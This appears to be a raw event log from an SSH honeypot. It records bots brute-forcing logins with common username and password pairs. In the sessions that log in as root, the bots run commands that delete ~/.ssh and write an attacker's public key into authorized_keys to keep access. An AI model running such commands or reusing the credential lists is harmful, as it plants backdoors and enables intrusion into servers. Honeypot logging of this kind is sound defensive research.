{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:52:31.918548Z","src_ip":"212.227.235.229","session":"8d46a3b75c40"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":7816,"dst_ip":"1.2.3.4","dst_port":22,"session":"b576ba3f6a79","protocol":"ssh","message":"New connection: 80.94.95.15:7816 (1.2.3.4:22) [session: b576ba3f6a79]","sensor":"my-vps","timestamp":"2025-08-28T15:52:32.090257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T15:52:32.091357Z","src_ip":"80.94.95.15","session":"b576ba3f6a79"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T15:52:32.142552Z","src_ip":"80.94.95.15","session":"b576ba3f6a79"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu@1234","message":"login attempt [ubuntu/ubuntu@1234] failed","sensor":"my-vps","timestamp":"2025-08-28T15:52:32.432477Z","src_ip":"80.94.95.15","session":"b576ba3f6a79"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:52:33.217125Z","src_ip":"212.227.235.229","session":"8d46a3b75c40"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"abc123","message":"login attempt [ubuntu/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:52:33.488444Z","src_ip":"80.94.95.15","session":"b576ba3f6a79"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:52:33.531542Z","src_ip":"212.227.235.229","session":"8d46a3b75c40"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:52:33.532482Z","src_ip":"212.227.235.229","session":"42da5246bcc7"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"abcd123","message":"login attempt [ubuntu/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:52:34.541503Z","src_ip":"80.94.95.15","session":"b576ba3f6a79"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"abcd1234","message":"login attempt [ubuntu/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T15:52:35.594975Z","src_ip":"80.94.95.15","session":"b576ba3f6a79"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"abc1234","message":"login attempt [ubuntu/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T15:52:36.650239Z","src_ip":"80.94.95.15","session":"b576ba3f6a79"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:52:37.704095Z","src_ip":"80.94.95.15","session":"b576ba3f6a79"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41314,"dst_ip":"1.2.3.4","dst_port":22,"session":"920f4aacbf21","protocol":"ssh","message":"New connection: 212.227.235.229:41314 (1.2.3.4:22) [session: 920f4aacbf21]","sensor":"my-vps","timestamp":"2025-08-28T15:52:46.633433Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:52:46.634139Z","src_ip":"212.227.235.229","session":"920f4aacbf21"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:52:46.849047Z","src_ip":"212.227.235.229","session":"920f4aacbf21"}
{"eventid":"cowrie.login.failed","username":"dolphin","password":"123456","message":"login attempt [dolphin/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T15:52:47.749386Z","src_ip":"212.227.235.229","session":"920f4aacbf21"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:52:48.967344Z","src_ip":"212.227.235.229","session":"920f4aacbf21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56948,"dst_ip":"1.2.3.4","dst_port":22,"session":"e48d2f310baf","protocol":"ssh","message":"New connection: 212.227.235.229:56948 (1.2.3.4:22) [session: e48d2f310baf]","sensor":"my-vps","timestamp":"2025-08-28T15:53:05.812673Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:53:05.813807Z","src_ip":"212.227.235.229","session":"e48d2f310baf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:53:06.054349Z","src_ip":"212.227.235.229","session":"e48d2f310baf"}
{"eventid":"cowrie.login.success","username":"root","password":"7070","message":"login attempt [root/7070] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:53:07.054980Z","src_ip":"212.227.235.229","session":"e48d2f310baf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:53:07.556930Z","src_ip":"212.227.235.229","session":"e48d2f310baf"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:53:07.557662Z","src_ip":"212.227.235.229","session":"e48d2f310baf"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:53:07.558722Z","src_ip":"212.227.235.229","session":"e48d2f310baf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:53:07.800120Z","src_ip":"212.227.235.229","session":"e48d2f310baf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:53:08.340917Z","src_ip":"212.227.235.229","session":"e48d2f310baf"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:53:08.341588Z","src_ip":"212.227.235.229","session":"e48d2f310baf"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:53:08.583901Z","src_ip":"212.227.235.229","session":"e48d2f310baf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:53:08.584908Z","src_ip":"212.227.235.229","session":"e48d2f310baf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58198,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc0a67b92106","protocol":"ssh","message":"New connection: 212.227.235.229:58198 (1.2.3.4:22) [session: cc0a67b92106]","sensor":"my-vps","timestamp":"2025-08-28T15:53:08.801926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:53:08.802968Z","src_ip":"212.227.235.229","session":"cc0a67b92106"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:53:09.032960Z","src_ip":"212.227.235.229","session":"cc0a67b92106"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49302,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8fbe30dbe17","protocol":"ssh","message":"New connection: 212.227.235.229:49302 (1.2.3.4:22) [session: c8fbe30dbe17]","sensor":"my-vps","timestamp":"2025-08-28T15:53:09.053432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:53:09.059586Z","src_ip":"212.227.235.229","session":"c8fbe30dbe17"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:53:09.300522Z","src_ip":"212.227.235.229","session":"c8fbe30dbe17"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:53:09.993931Z","src_ip":"212.227.235.229","session":"cc0a67b92106"}
{"eventid":"cowrie.login.success","username":"root","password":"Reza1234","message":"login attempt [root/Reza1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:53:10.270215Z","src_ip":"212.227.235.229","session":"c8fbe30dbe17"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:53:10.774409Z","src_ip":"212.227.235.229","session":"c8fbe30dbe17"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:53:10.775164Z","src_ip":"212.227.235.229","session":"c8fbe30dbe17"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:53:10.776187Z","src_ip":"212.227.235.229","session":"c8fbe30dbe17"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:53:11.019122Z","src_ip":"212.227.235.229","session":"c8fbe30dbe17"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:53:11.225457Z","src_ip":"212.227.235.229","session":"cc0a67b92106"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59196,"dst_ip":"1.2.3.4","dst_port":22,"session":"4eb6c38383b5","protocol":"ssh","message":"New connection: 212.227.235.229:59196 (1.2.3.4:22) [session: 4eb6c38383b5]","sensor":"my-vps","timestamp":"2025-08-28T15:53:11.442534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:53:11.443246Z","src_ip":"212.227.235.229","session":"4eb6c38383b5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:53:11.559569Z","src_ip":"212.227.235.229","session":"c8fbe30dbe17"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:53:11.560277Z","src_ip":"212.227.235.229","session":"c8fbe30dbe17"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:53:11.661153Z","src_ip":"212.227.235.229","session":"4eb6c38383b5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:53:11.804252Z","src_ip":"212.227.235.229","session":"c8fbe30dbe17"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:53:11.805117Z","src_ip":"212.227.235.229","session":"c8fbe30dbe17"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49628,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6a25d2595af","protocol":"ssh","message":"New connection: 212.227.235.229:49628 (1.2.3.4:22) [session: b6a25d2595af]","sensor":"my-vps","timestamp":"2025-08-28T15:53:12.043876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:53:12.044780Z","src_ip":"212.227.235.229","session":"b6a25d2595af"}
